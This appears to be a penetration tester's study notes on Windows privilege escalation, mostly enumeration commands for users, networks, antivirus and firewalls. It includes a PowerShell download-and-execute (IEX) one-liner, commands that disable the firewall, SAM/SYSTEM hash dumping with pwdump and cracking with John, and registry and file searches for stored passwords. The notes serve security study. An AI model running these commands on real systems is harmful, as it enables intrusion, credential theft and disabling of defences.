Windows

Monday, August 17, 2020

3:12 PM Backlink: reference-notes-readme


Enumeration Guides

Windows Privilege Escalation Guide

FuzzySecurity | Windows Privilege Escalation Fundamentals

Windows elevation of privileges

OSCP-note/Windows_commands at master · R0B1NL1N/OSCP-note · GitHub

Local AD Abuse

Retrieve Deleted Items

Get-ADObject -filter ‘isDeleted -eq $true’ -includeDeletedObjects -Properties *

Remote Script Execution

Use the following to source and execute a file from a remote HTTP server on the local Windows machine:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("http://...")

Privesc Enum Scripts

Sherlock - Run with "Find-AllVulns" to check for MSxxxxx style kernel exploit vulnerabilities.

PowerUp.ps1 - Run with "Invoke-AllChecks" to check for various exploit vulnerabilities similar to linux smart enum etc.

systeminfo - Get full systeminfo to feed into WinPrivescChecker.

Windows Privesc Commands

AV Enumeration

List AV products in PowerShell:

Get-CimINstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

To list AV products using WMIC in a CMD prompt:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

Windows System Information

Get Windows Version and Configuration

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Extract patches and updates

wmic qfe

Get Architecture

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

List all env variables

set

Get-ChildItem Env: | ft Key,Value

List all drives

wmic logicaldisk get caption || fsutil fsinfo drives

wmic logicaldisk get caption,description,providername

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

User/Group Information

Check user privileges

whoami /priv

Multiple Methods to list all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

List logon requirements, helpful for brute-forcing.

net accounts

Get details about user

net user <username>

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Network Enum

List all interfaces, IP info, DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List ARP table

arp -A

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

Get current connections

netstat -ano

List firewall info

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List ports blocked by firewall.

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

View SNMP configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

EoP Enum

SAM/SYSTEM Files

The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.

%SYSTEMROOT% = C:\Windows # Usually
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Generate a hash file for John using pwdump or samdump2.

pwdump SYSTEM SAM > /root/sam.txt

samdump2 SYSTEM SAM -o sam.txt

Then crack it with john -format=NT /root/sam.txt.

Search for files contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt

findstr /si password *.xml *.ini *.txt *.config

findstr /spin "password" *.*

Search for file with specific filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

where /R C:\ user.txt

where /R C:\ *.ini

Search registry for key names and passwords

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Read a value of a certain sub key

REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList

Passwords can be found in unattended.xml sometimes, stored in b64

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Display the content of these files with

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Helpful Bash-like commands

ipconfig == ifconfig == ip a

ipconfig /displaydns

tasklist == ps aux

netstat -na

Further Links

Windows Privilege Escalation